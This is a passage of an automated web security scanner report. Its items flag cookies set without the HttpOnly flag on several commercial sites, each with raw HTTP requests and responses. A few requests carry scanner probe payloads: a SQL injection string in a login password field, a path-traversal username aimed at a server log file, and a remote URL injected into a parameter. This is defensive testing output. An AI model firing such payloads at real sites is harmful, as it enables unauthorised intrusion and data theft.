Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=438708&sc=4&whence=&n=1&ext=T HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:36 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1700514546:616363742D6A6176613031382E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=B5nHN1Gc4ybGGqDmBpJGQWc4zLmmTVYkQCRtT62dbcTHJ21Gh0nyXcRkBNW8L2lLYXTlBCqgWNYv81PF1jh1nnCgkxLb691G2fmtYTf9gXpBvLwyvDgFJKknzh1Q5jQD!-620026609; path=/
Set-Cookie: NLVisitorId=rcHW8495AWICDiX0; domain=checkout.netsuite.com; expires=Sunday, 15-Apr-2012 14:26:36 GMT; path=/
Set-Cookie: NLShopperId=rcHW8495AXICDie_; domain=checkout.netsuite.com; expires=Monday, 02-May-2011 14:26:36 GMT; path=/
Set-Cookie: NS_VER=2011.1.0; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=869
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 2244


<html>
<head>
<title>Checkout</title>
<link rel='stylesheet' href='/core/styles/pagestyles.nl?ct=-2&bglt=F2F4F6&bgmd=EDF1F7&bgdk=737A82&bgon=5C7499&bgoff=AFB5BF&bgbar=5C7499&tasktitletext=E4EAF4&crum
...[SNIP]...
17.17. http://customer.kronos.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://customer.kronos.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: customer.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303740624|check#true#1303738824; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:39:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://customer.kronos.com/Default.asp
Content-Length: 160
Content-Type: text/html
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=DIMMPBCAPHHPGGNHONJOMKDE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://customer.kronos.com/Default.asp">here</a>.</body>
17.18. http://customer.kronos.com/user/managefavorites.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://customer.kronos.com
Path:   /user/managefavorites.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /user/managefavorites.asp?favurl=http://customer.kronos.com/SiteFeedbackForm.htm&t=Site HTTP/1.1
Host: customer.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_nr=1303741346229; s_lv=1303741346233; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 15:24:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /default.asp?rurl=%2Fuser%2Fmanagefavorites%2Easp?favurl%3Dhttp%3A%2F%2Fcustomer%2Ekronos%2Ecom%2Fsitefeedbackform%2Ehtm%7Ct%3Dsite
Content-Length: 252
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=GMPMPBCALACJJKCGHDCIIDIB; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/default.asp?rurl=%2Fuser%2Fmanagefavorites%2Easp?favurl%3Dhttp%3A%2F%2Fcustomer%2Ekronos%2Ecom%2F
...[SNIP]...
17.19. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://customer.kronos.com
Path:   /Default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

HEAD /Default.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=GKMMPBCAFDPKJBLLDIIBOHPD; path=/
Cache-control: private

17.20. http://demo.kayako.com/supportsuite/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://demo.kayako.com
Path:   /supportsuite/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /supportsuite/index.php HTTP/1.1
Host: demo.kayako.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=243534751.1303758892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243534751.649237146.1303758892.1303758892.1303758892.1; __utmc=243534751; __utmb=243534751.1.10.1303758892

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:41:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: SWIFT_sessionid40=3vh1b62n3zhh17dlhrf909i97f5q3akv; path=/
Connection: close
Content-Type: text/html
Content-Length: 16066


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UT
...[SNIP]...
17.21. http://demo.kayako.com/supportsuite/visitor/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://demo.kayako.com
Path:   /supportsuite/visitor/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /supportsuite/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email= HTTP/1.1
Host: demo.kayako.com
Proxy-Connection: keep-alive
Referer: http://demo.kayako.com/supportsuite/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=243534751.1303758892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243534751.649237146.1303758892.1303758892.1303758892.1; __utmc=243534751; __utmb=243534751.1.10.1303758892; SWIFT_sessionid40=cdydhwsfse8y4xjyex80hyc0xlrhdz3j; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:43:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Expires: Tue, 26 Apr 2011 19:43:02 GMT
Cache-Control: max-age=3600, must-revalidate
Set-Cookie: SWIFT_sessionid80=jxv96mz3c1jmd2m66kgxozfmpincgj9l; path=/
Set-Cookie: SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; path=/
Connection: close
Content-Type: text/javascript
Content-Length: 11625

//===============================
// Kayako LiveResponse
// Copyright (c) 2001-2011
// http://www.kayako.com
// License: http://www.kayako.com/license.txt
//===============================

var sessio
...[SNIP]...
17.22. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asp/home/login.asp HTTP/1.1
Host: employer.unicru.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 42vm
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=993264394.20736.0000; path=/


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...
17.23. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asp/home/login.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: employer.unicru.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:40:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 43
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSAATCQTA=MGBECJJCAMBAEKDDNHDKHNIH; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=184615946.20736.0000; path=/


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...
17.24. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 214

txtUsername=Smith&txtPassword=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&image1.
...[SNIP]...

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:52:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Location: ../../asp/home/ErrorPage.asp?ErrCode=0
Content-Length: 159
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
Set-Cookie: ASPSESSIONIDQCDRBTRC=NNLPKKJCDHNIPJJGHAECJHGA; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=385942538.20736.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../asp/home/ErrorPage.asp?ErrCode=0">here</a>.</body>
17.25. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /asp/home/login.asp HTTP/1.1
Referer: https://employer.unicru.com/asp/home/login.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: employer.unicru.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 106

txtUsername=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2flog%2fapache%2ferror.log&txtPassword=3

Response

HTTP/1.1 302 Object moved
Date: Mon, 25 Apr 2011 13:50:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 44
Location: ../../asp/home/ErrorPage.asp?ErrCode=0
Content-Length: 159
Content-Type: text/html
Set-Cookie: Emp=datpwx=&UN=&SkipSSL=&PT=&step=&LHIS=&Browser=&ActiveLocation=&Expiration=4%2F24%2F2010&ActiveState=&UType=&MultipleLocation=&RowsPerPage=&CID=&EUID=; path=/
Set-Cookie: ASPSESSIONIDSSRADQTB=EINNMKJCGHFFJHCJOHNLPDMM; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=1211368202.20736.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="../../asp/home/ErrorPage.asp?ErrCode=0">here</a>.</body>
17.26. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_2&location=http%3A%2F%2Fwww.livejournal.com%2F&uid=ZC45X9Axu6NOUFfX_289669&xy=0%2C0&wh=300%2C250&vchannel=69112&cid=166308&iad=1303741261966-50137159274891016&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888; JSESSIONID=C0008DDFCA8D08F38F996B46ADF6D0E1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4AA45FF46CF90CD8523E63E97BF73AD9; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 0
Date: Mon, 25 Apr 2011 14:20:50 GMT
Connection: close

17.27. http://hostpapasupport.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://hostpapasupport.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hostpapasupport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:44:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: SWIFT_sessionid40=gmfpuglm6vnd5hd5tfn09i4kuyfmsiw0; path=/
Content-Type: text/html
Content-Length: 26068


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UT
...[SNIP]...
17.28. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hmc/report/ HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:30 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d8308cb242bf2b615f7a;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4789


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
17.29. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hmc/report/index.cfm?register=http://netsparker.com/n HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 102

email=netsparker%40example.com&j_password=3&j_passwordconfirm=3&j_username=Smith&name=Smith&storenum=3

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:46 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e307db0b53d142e16b3;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
17.30. http://partner-support.wiki.zoho.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://partner-support.wiki.zoho.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: partner-support.wiki.zoho.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/me_partners.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: zwcsrfcki=a464e14f-4662-4feb-a6bd-971a8b0a1575; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=786F43CF2EEC7C59F1192542DC2667C0; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:15:18 GMT
Server: Apache-Coyote/1.1
Content-Length: 4700


<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

   
<title>Sign in</title>
<style>

BODY {
   background-color: #FFFFFF;
   margin:
...[SNIP]...
17.31. http://partners.criticalwatch.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://partners.criticalwatch.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: partners.criticalwatch.com
Proxy-Connection: keep-alive
Referer: http://www.criticalwatch.com/support/critical-watch-support.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2; __utmc=164981229; __utmb=164981229

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:02:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22e3e36a1656899ba1b39a906867342f35%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303736523%22%3B%7Dbb0b132cbb659931fd437f541f9e27c3; expires=Mon, 25-Apr-2011 17:02:03 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html; ch
...[SNIP]...
17.32. http://playaudiomessage.com/play.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://playaudiomessage.com
Path:   /play.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /play.asp?m=538364&f=YNIZEE&ps=13&c=FFFFFF&pm=2&h=25 HTTP/1.1
Host: playaudiomessage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 25 Apr 2011 19:34:37 GMT
ServerID: 52
P3P: "CP=\"IDC CSP DOR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\""
Content-Length: 1035
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASCRBCAQ=HGPKABGBGEKMJANEMNDJEEJA; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">

<title>InstantAudioPlayer</title>

...[SNIP]...
17.33. https://secure.trust-guard.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: http://www.trust-guard.com/Website-Security-s/89.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.7.10.1303748966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:31:28 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=u4eu14e9is22aoq9meeuch3fu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

